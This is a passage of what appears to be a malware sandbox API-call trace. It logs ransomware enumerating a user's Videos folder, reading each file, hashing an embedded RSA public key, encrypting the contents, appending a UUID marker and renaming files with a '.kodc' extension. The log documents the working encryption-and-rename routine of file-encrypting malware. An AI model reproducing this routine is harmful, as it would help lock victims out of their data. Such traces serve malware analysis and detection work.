(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\36oswwxbZIVtrKr3R6T.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\36oswwxbzivtrkr3r6t.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\36oswwxbZIVtrKr3R6T.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\36oswwxbzivtrkr3r6t.avi.kodc")) returned 1 [0099.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.930] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.931] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fa22230, ftCreationTime.dwHighDateTime=0x1d5b7ec, ftLastAccessTime.dwLowDateTime=0xcc3dcee0, ftLastAccessTime.dwHighDateTime=0x1d5c207, ftLastWriteTime.dwLowDateTime=0xcc3dcee0, ftLastWriteTime.dwHighDateTime=0x1d5c207, nFileSizeHigh=0x0, nFileSizeLow=0x3dd4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Thswkk09oH.avi", cAlternateFileName="4THSWK~1.AVI")) returned 1 [0099.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.931] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Thswkk09oH.avi") returned=".avi" [0099.931] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Thswkk09oH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4thswkk09oh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.931] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=15828) returned 1 [0099.932] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.935] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3dae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.935] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.936] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.936] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.936] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x3dd4, lpOverlapped=0x0) returned 1 [0099.936] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.936] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.936] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.936] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.936] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.937] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.937] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.937] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.937] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.937] GetLastError () returned 0x0 [0099.937] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.937] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.937] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.937] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.937] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3dd0) returned 0x9ba6d90 [0099.938] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c0b8 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7aa0 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c100 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ab8 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ae8 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b00 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.938] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.938] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ae8 | out: hHeap=0x630000) returned 1 [0099.938] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b00 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b00 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ae8 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b00 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ae8 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.939] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.939] GetCurrentThreadId () returned 0x42c [0099.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba60c8 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.940] GetCurrentThreadId () returned 0x42c [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.940] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.940] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ae8 [0099.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b00 [0099.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.941] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.942] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3dd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.942] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.942] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.942] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.942] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.942] CloseHandle (hObject=0x5cc) returned 1 [0099.943] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Thswkk09oH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4thswkk09oh.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\4Thswkk09oH.avi.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\4thswkk09oh.avi.kodc")) returned 1 [0099.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.944] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.944] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.946] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.946] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd159c200, ftCreationTime.dwHighDateTime=0x1d5b8f0, ftLastAccessTime.dwLowDateTime=0x66154610, ftLastAccessTime.dwHighDateTime=0x1d5bf65, ftLastWriteTime.dwLowDateTime=0x66154610, ftLastWriteTime.dwHighDateTime=0x1d5bf65, nFileSizeHigh=0x0, nFileSizeLow=0x7e47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="67YJ.mkv", cAlternateFileName="")) returned 1 [0099.946] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\67YJ.mkv") returned=".mkv" [0099.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\67YJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\67yj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.946] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=32327) returned 1 [0099.946] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.950] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7e21, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.950] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.951] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.951] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.951] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.951] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x7e47, lpOverlapped=0x0) returned 1 [0099.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.952] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.952] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.953] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.953] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.953] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.953] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.953] GetLastError () returned 0x0 [0099.953] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.953] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.953] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.953] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.953] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.953] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.953] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.954] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7e50) returned 0x9ba6d90 [0099.954] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.954] HeapFree (in: hHeap=0x630000, 